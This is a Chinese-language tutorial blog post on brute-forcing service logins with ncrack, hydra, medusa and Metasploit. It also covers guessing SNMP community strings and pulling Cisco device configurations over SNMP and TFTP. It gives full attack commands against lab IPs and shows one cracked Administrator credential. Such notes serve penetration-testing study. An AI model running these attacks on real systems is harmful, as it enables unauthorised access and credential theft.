2. 程式人生 > >暴力破解工具

暴力破解工具

阿新 發佈:2018-11-12

需要有一個強大的字典,如果太大了的話,計算機索引不過來,也是沒用的.

口令的破解全靠運氣,運氣好幾秒鐘,幾分鐘都有可能,運氣不好一天二天解不開也正常.總要去嘗試

暴力破解,會影響機器的CPU,可能會導致拒絕服務的情況.而且還會有拒絕密碼登陸這種情況.

工具:https://github.com/tearsecurity/leviathan

Leviathan是一個大規模審計工具包,具有廣泛的服務發現,強力,SQ​​L注入檢測和執行自定義漏洞利用功能。它包含開源工具,如masscan,ncrack,dsss,併為您提供組合使用它們的靈活性。

_________________________________________________________

官方都給出了演示和相關文件!!!

ncrack : https://nmap.org/ncrack/man.html

ncrack暴破RDP帳戶 

ncrack -u Administrator -P /root/shellWork/UserAndPassword/password.pwd -p 3389 192.168.2.110 

Discovered credentials for ms-wbt-server on 192.168.2.110 3389/tcp:
192.168.2.110 3389/tcp ms-wbt-server: 'Administrator' '000000'


rdesktop 192.168.2.110
 
ncrack -p 22 --user username -P /root/shellWork/UserAndPassword/password.txt IP

Hydra : https://github.com/vanhauser-thc/thc-hydra

hydra -l root -P /root/shellWork/UserAndPassword/password.txt 192.168.2.111 ssh

medusa   : htt

ps://github.com/jmk-foofus/medusa

medusa -u msfadmin -P /root/shellWork/UserAndPassword/password.txt -h 192.168.2.111 -M ssh

Metasploit:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > show options 


msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/shellWork/UserAndPassword/user.usr
USER_FILE => /root/shellWork/UserAndPassword/username.txt
msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/shellWork/UserAndPassword/password.txt
PASS_FILE => /root/shellWork/UserAndPassword/password.txt
msf auxiliary(scanner/ssh/ssh_login) > set THREADS 4
THREADS => 4
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.2.111
RHOSTS => 192.168.2.111
msf auxiliary(scanner/ssh/ssh_login) > exploit

_____________________________________________________________________________________________________

對Cisco裝置猜測團體字串:

onesixtyone : https://github.com/trailofbits/onesixtyone

SNMP協議是一種無狀態的,面向資料報的協議。SNMP掃描程式是一種程式,它將SNMP請求傳送到多個IP地址,嘗試不同的社群字串並等待回覆。

SNMP 協議: https://blog.csdn.net/shanzhizi/article/details/11606767

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt IP #onesixtyone能夠找到公共和私人社群字串

#把找到的團體字串 寫入一個檔案
echo -e "public\nsecret\n" > test.txt

使用Metasploit 解密:

msf > search snmp_login

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/scanner/snmp/snmp_login                   normal  SNMP Community Login Scanner


msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(scanner/snmp/snmp_login) > show options 

msf auxiliary(scanner/snmp/snmp_login) > set PASS_FILE text.txt
PASS_FILE => text.txt
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS IP
RHOSTS => IP
msf auxiliary(scanner/snmp/snmp_login) > exploit 
msf auxiliary(scanner/snmp/snmp_login) > creds #檢視 團體字是隻讀還是能讀寫

SNMP和TFTP是處理Cisco裝置時最常用的兩個協議.SNMP可以獲取和設定設定裝置的資訊.TFTP是Cisco裝置將配置檔案,新映像和其他資訊載入到交換機或路由裝置的方式之一,Cisco裝置可以作為TFTP伺服器,允許其他作業系統從該裝置上載入配置資訊和配置檔案等.

可以用SNMP來獲得Cisco裝置的配置資訊和執行配置,可以通過TFCP將新配置推送回伺服器.

 

msf > use auxiliary/scanner/snmp/cisco_config_tftp 
msf auxiliary(scanner/snmp/cisco_config_tftp) > show options 

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port (UDP)
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(scanner/snmp/cisco_config_tftp) >

這個模組可以向裝置傳送SNMP寫命令,也可以下載配置檔案,成功後msf會啟動一TFTP服務,讓裝置連線到msf啟動的服務.

msf會解析檔案,得到密碼.

 

 

 

相關推薦

暴力破解工具

需要有一個強大的字典,如果太大了的話,計算機索引不過來,也是沒用的. 口令的破解全靠運氣,運氣好幾秒鐘,幾分鐘都有可能,運氣不好一天二天解不開也正常.總要去嘗試 暴力破解,會影響機器的CPU,可能會導致拒絕服務的情況.而且還會有拒絕密碼登陸這種情況. 工具:https://github.

你的Root賬號安全嗎?-看我用phpmyadmin密碼暴力破解工具攻破你的系統

你的Root賬號安全嗎?-看我用phpmyadmin密碼暴力破解工具攻破你的系統 simeon phpmyadmin密碼暴力破解是指通過指定賬號和密碼對mysql資料庫進行登入嘗試,如果字典中的密碼跟實際密碼匹配,則意味著密碼破解成功。破解的前提是可以通過url正常登入phpmyadmin。

暴力破解工具hadry與Medusa

---恢復內容開始--- 暴力破解工具hadry與Medusa   內容 (一)hadry (二)Medusa       (一)hadry 選項 -l LOGIN 指定破解的使用者名稱稱,對特定使用者破解。 -L FILE 從檔案中載入使用

強力密碼暴力破解工具:hydra

語法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-

MySQL和MSSQL暴力破解和後期利用工具

Enumdb是MySQL和MSSQL資料庫的強力和後期利用工具。當提供使用者名稱和/或密碼列表時,它將迴圈通過每個目標主機尋找有效憑證。預設情況下,enumdb將使用新發現的憑據通過對錶或列名稱的關鍵字搜尋來搜尋主機資料庫中的敏感資訊。然後可以提取此資訊並將其報告給.csv或.xlsx輸出檔案。 下載安裝

Dirhunt:一款無需進行暴力破解攻擊即可列舉Web伺服器目錄的工具

工具介紹 Dirhunt是一款經過優化的Web爬蟲,主要功能是搜尋並分析伺服器目錄。如果目標伺服器開啟了“index of”模式之後,該工具將能夠幫助你發現很多有意思的東西。除此之外,如果伺服器沒有開啟目錄列舉功能的話,Dirhunt仍然可以正常工作。值得一提的是,如果目標伺服器使用了空白的in

PN532-mfoc-mfcuk-windows(IC卡密碼破解工具) By:dj1149 -01

dll 但是 pos adding hot 包括 padding 加密 coder #使用本工具庫必須要遵守當地法律。#本工具集合由林編譯,歷時一個星期左右。#出現任何違法違規事件均不與本人有任何責任,望悉知!#本工具目前支持PN532_UART,後期將重新編譯lib

shell 自動檢查SSH暴力破解IP並阻斷攻擊

ssh在5分鐘內嘗試密碼登錄錯誤超過10次的拒絕這個ip#!/bin/bashlocal_ip="192.168.0.4" #定義本地IP不會被拒絕tmp_log=`mktemp`cat /var/log/secure |grep "Failed password for root from" |awk

hydra 暴力破解

hydra 暴力破解#!/bin/bashIP=192.168.0.1Users=/server/hack/password/usersPassword=/server/hack/password/dict/0-9.8位純數密碼.txtLog=/server/hack/log/$IP.log#爆破3389端口

NAVICAT for 32位/64位 及破解工具PatchNavicat

點擊 用戶 postgres esql sqlit oracle style for text    Navicat提供多達 7 種語言供客戶選擇,被公認為全球最受歡迎的數據庫前端用戶介面工具。  它可以用來對本機或遠程的 MySQL、SQL Server、SQLite、O

Linux VPS 安全配置:禁用22端口、root用戶以及配置Denyhosts防暴力破解

usermod run 主題 工具 wheel mit smt 個人 連不上 最近租用了一臺Vultr東京機房的VPS,每天都會生成許多異常登錄失敗的日誌,疑似受到掃描軟件的暴力破解,遂Google了一下服務器安全防護方面的知識。 廢話不多說,下面將操作過程記錄下來: 註意

暴力破解

-s per 壓縮 num 密碼 ash 破解 個人信息 hub 暴力破解 暴力破解的原理就不講了. 講幾個破解工具吧 1.在線破解   1.1hydra(九頭蛇)   支持很多種服務登陸破解      hydra -l user -P passlist.

windows及office破解工具--KMSpico

windows工具原料:1、windows正版安裝包與Office2、KMSpico工具方法:1、安裝系統;2、安裝KMSpico;3、打開KMSpico,聆聽一段音質很差的英語提示和背景音樂,這個工具會自動檢測你安裝的Windows與Office的;4、點擊這個按鈕、進度100%時就OK啦。5、Tokens

fail2ban防止暴力破解

破解 服務器 監控 系統資源 align 穩定版 www 啟動 onf   暴力破解在公網上是很常見的,當我們在公網上的服務器被暴力破解的時候,我們就的采取相應的措施,今天我們來講一個開源軟件fail2ban,以防止暴力破解。 我們去官網下下載穩定版本的fail2ban安裝

web實戰之暴力破解

web安全本文出自 “大李子” 博客,謝絕轉載!web實戰之暴力破解

linux 防止ssh暴力破解密碼

blog color for col logs pan linux define rep 收集 /var/log/secure 裏面的信息,若是某個IP 鏈接次數超過一定次數 ,則把此ip記錄到/etc/hosts.deny裏面 #!/bin/bash #Denyh

Leetcode拾萃(算法篇)——暴力破解(DFS、BFS、permutation)

turn 層次 traversal 雞兔同籠 pda www str fine ace 引言 現在互聯網的招工流程,算法題是必不可少的,對於像我這種沒搞過ACM的吃瓜群眾,好在有leetcode,拯救我於水火。於是乎,斷斷續續,刷了一些題,其中一些題還是值得細細品味的,現把

Burp Suite滲透操作指南 【暴力破解

安裝 組合 ont 進行 forum iterator num 分享 有效 1.1 Intruder高效暴力破解 其實更喜歡稱Intruder爆破為Fuzzing。Intruder支持多種爆破模式。分別是:單一字典爆破、多字段相同字典爆破、多字典意義對應爆破、聚合式爆破。

linux 防暴力破解

secure pri uniq -c body scan drop 暴力破解 gre #!/bin/bash SCANIP=`grep "Failed" /var/log/secure | awk ‘{print $(NF-3)}‘| sort |uniq -c | awk

【Python】HackBack(獲取暴力破解服務器密碼的IP來源)

split time get main ports import var api pre 1、前言 又在0x00sec上翻到好東東。 https://0x00sec.org/t/python-hackback-updated/882 帖子裏的腳本會得到那些暴力服務器密碼失敗